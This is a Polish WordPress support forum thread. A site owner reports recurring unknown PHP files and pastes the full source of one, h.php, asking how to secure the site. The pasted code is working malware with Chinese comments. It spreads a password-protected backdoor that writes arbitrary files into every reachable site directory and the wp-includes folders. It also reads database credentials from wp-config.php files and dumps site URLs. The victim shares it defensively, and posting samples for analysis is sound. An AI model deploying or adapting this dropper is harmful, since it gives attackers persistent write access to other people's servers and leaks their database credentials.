Wsparcie » Zaawansowane » Dodatkowe pliki na serwerze – włamanie / wirus ?

 • Od kilku tygodni pojawiają mi się katalogi z mnóstwem plików html w środku. dodatkowo pojawiają się pliki php w głównym katalogu strony, takie jak berg.php cron.php, we wszystkich jest podobny kod.
  Zmieniłem już hasło do FTP, zaktualizowaełm WordPressa i wtyczki, a pliki nadal się pojawiają (w różnych odstępach czasu). Ostatnio zaopserwowałem również dodatkowy plik h.php który miał inną składnię niż pozostałe. Poniżej przedstawiam treść pliku h.php i proszę o propozycje zabezpieczania strony lub usunięcia luki
  ——————
  treść pliku h.php
  ——————

  <!doctype html>
  <html>
  <head>
  <meta charset="utf-8">
  <title>接口生成挖掘脚本</title>
  </head>
  
  <body>
  
  <?php
  
  //版本 jamin mysql 1.1.3
  
  //---------------------------//
  
  $jkname =array('int.php','inter.php','deal.php','beng.php','xr.php','cron.php');
  
  //二级的请注意修改  如
  $dir = dirname(dirname(__FILE__)); $dirhh = 1; //站点/home/##/baidu.com/ 根目录
  //$dir = dirname(dirname(dirname(__FILE__))); $dirhh = 0; //站点/home/##/baidu.com/xxxx/ 根目录
  
  $edirarr = array('www','http','https','public_html','html','httpdocs','web'); //,可添加可能出现的二级/xxxx/级目录
  
  $dirb = "wp-includes"; //排除根目录写不进去 二级目录名可写 根据站点类型修改
  
  //---------------------------//
  
  	//接口源码
  
  $tmp = '<?php
  header("Content-Type: text/html; charset=utf-8");
  $action=$_REQUEST[\'action\'];
  $password=$_REQUEST[\'password\'];
  $pathname=$_REQUEST[\'pathname\'];
  $keywordindex=$_REQUEST[\'keywordindex\'];
  $filename=$_REQUEST[\'filename\'];
  $body=stripslashes($_REQUEST[\'body\']);
  
  if($action=="test")
  {
    echo \'test success\';
    return;
  }
  
  if($action!="publish")
  {
    echo \'action error\';
    return;
  }
  
  if($action==""||$password==""||$filename==""||$body=="")
  {
    echo \'parameters error\';
    return;
  }
  
  if($password!="5fobohlovr6v")
  {
    echo \'password error\';
    return;
  }
  
  $wjj=dirname(__FILE__);
  if(!file_exists($wjj))
  {
    mkdir($wjj,0777);
  }
  createFolder($pathname);
  
  $fp=fopen($pathname.\'/\'.$filename,"w");
  //fwrite($fp,"\xEF\xBB\xBF".iconv(\'gbk\',\'utf-8//IGNORE\',$body));
  fwrite($fp,"\xEF\xBB\xBF".$body);
  fclose($fp);
  echo "publish success";
  
  function createFolder($path)
  {
    if (!file_exists($path))
    {
      createFolder(dirname($path));
      mkdir($path, 0777);
    }
  }
  
  function mkdirs($dir)
  {
    if(!is_dir($dir))
    {
      if(!mkdirs(dirname($dir)))
      { return false; }
      if(!mkdir($dir,0777))
      { return false; }
    }
    return true;
  } 
  
  function rmdirs($dir)
  {
    $d = dir($dir);
    while (false !== ($child = $d->read()))
    {
      if($child != \'.\' && $child != \'..\')
      {
        if(is_dir($dir.\'/\'.$child))
          rmdirs($dir.\'/\'.$child);
        else
          unlink($dir.\'/\'.$child);
      }
    }
    $d->close();
    rmdir($dir);
  } 
  
  ?>';	
  
  	function pz($dir){
  			$myfile = @fopen($dir, "r");
  			$file = fread($myfile,filesize($dir));
  			$file = preg_replace('/</','',$file);
  			$file = preg_replace('/>/','',$file);
  
  			preg_match_all('#(\'DB_HOST\', \'(.*?)\')#U',$file,$zjarr);
    			preg_match_all('#(\'DB_NAME\', \'(.*?)\')#U',$file,$kmarr);
    			preg_match_all('#(\'DB_USER\', \'(.*?)\')#U',$file,$zharr);
    			preg_match_all('#(\'DB_PASSWORD\', \'(.*?)\')#U',$file,$mmarr);
    			preg_match_all('#table_prefix\s+=\s+\'(.*?)\'#U',$file,$qzarr);
  
  			$con = @mysql_connect($zjarr[2][0],$zharr[2][0],$mmarr[2][0]); 
  
  				if (!$con){ 
  
  					return '0';
  					}else{
  						$db_selected = @mysql_select_db($kmarr[2][0], $con);
  						if (!$db_selected) { 
  
  						return '0';
  						}else{
  						$sql = 'SELECT * FROM '.$qzarr[1][0].'options WHERE option_id=1';
  
  						$result=mysql_query($sql, $con);
  						while($row=mysql_fetch_array($result)){ 
  
  						return $row['option_value'];
  
  						}
  					}
  
  				}
  				mysql_close($con);
  
  		}
  
  	//生成接口
  		function ldirb($ldir,$tmp){
  		$wdir = @fopen($ldir,'w');
  		if($wdir){
  		fwrite($wdir,$tmp);
  			 return true;
  		}else{
  			return false;
  			}
  		}
  
  $dh = opendir($dir);
  
  //主循环程序开始
  while ($f = readdir($dh)){
     if($f =='.' || $f =='..'){
  		continue;
  		}else{
  		if(is_dir($dir.'/'.$f)){ //121
  			if($dirhh){
  					for($i=0;$i<count($jkname);$i++){
  						 ldirb($dir.'/'.$f.'/'.$jkname[$i],$tmp);
  					}
  
  				if(preg_match("/[a-z0-9][_\-]*?\.(\w\w$|\w\w\w$|\w\w\w\w$)/i",$f)){
  					if(file_exists($dir.'/'.$f.'/'.$jkname[0])){
  						echo $f.'<br>';
  					}else{
  						if(is_dir($dir.'/'.$f.'/'.$dirb)){
  							 for($i=0;$i<count($jkname);$i++){
  
  								ldirb($dir.'/'.$f.'/'.$dirb.'/'.$jkname[$i],$tmp);
  							 }
  							if(file_exists($dir.'/'.$f.'/'.$dirb.'/'.$jkname[0])){
  								echo $f.'/'.$dirb.'/'.$jkname[0].'<br>';
  							}
  						}
  					}
  				}else{
  
  				 if(file_exists($dir.'/'.$f.'/wp-config.php')){
  				 	if( pz($dir.'/'.$f.'/wp-config.php') !== '0'){
  						echo  pz($dir.'/'.$f.'/wp-config.php').'<br>';
  				 	}}
  				}
  			}else{
  				for($i=0;$i<count($edirarr);$i++){
  					if(is_dir($dir.'/'.$f.'/'.$edirarr[$i])){
  						for($t=0;$t<count($jkname);$t++){
  							ldirb($dir.'/'.$f.'/'.$edirarr[$i].'/'.$jkname[$t],$tmp);
  						}
  
  						if(preg_match("/[a-z0-9][_\-]*?\.(\w\w$|\w\w\w$|\w\w\w\w$)/i",$f)){ 
  
  							if(file_exists($dir.'/'.$f.'/'.$edirarr[$i].'/'.$jkname[0])){
  							echo $f.'<br>';
  							}else{
  								if(is_dir($dir.'/'.$f.'/'.$edirarr[$i].'/'.$dirb)){
  									 for($h=0;$h<count($jkname);$h++){
  
  										ldirb($dir.'/'.$f.'/'.$edirarr[$i].'/'.$dirb.'/'.$jkname[$i],$tmp);
  									 }
  									if(file_exists($dir.'/'.$f.'/'.$dirb.'/'.$jkname[0])){
  										echo $f.'/'.$dirb.'/'.$jkname[0].'<br>';
  									}
  								}
  							}
  						}else{
  							$dircon = $dir.'/'.$f.'/'.$edirarr[$i].'/wp-config.php';
  							if(file_exists($dircon)){
  								if( pz($dircon) !== '0'){
  									echo pz($dircon).'<br>';
  								}
  							}
  						}
  					}
  				}
  			}
  		}
  	}
  }
  
  ?>
  
  </body>
  </html>

 • Temat ‘Dodatkowe pliki na serwerze – włamanie / wirus ?’ jest zamknięty na nowe odpowiedzi.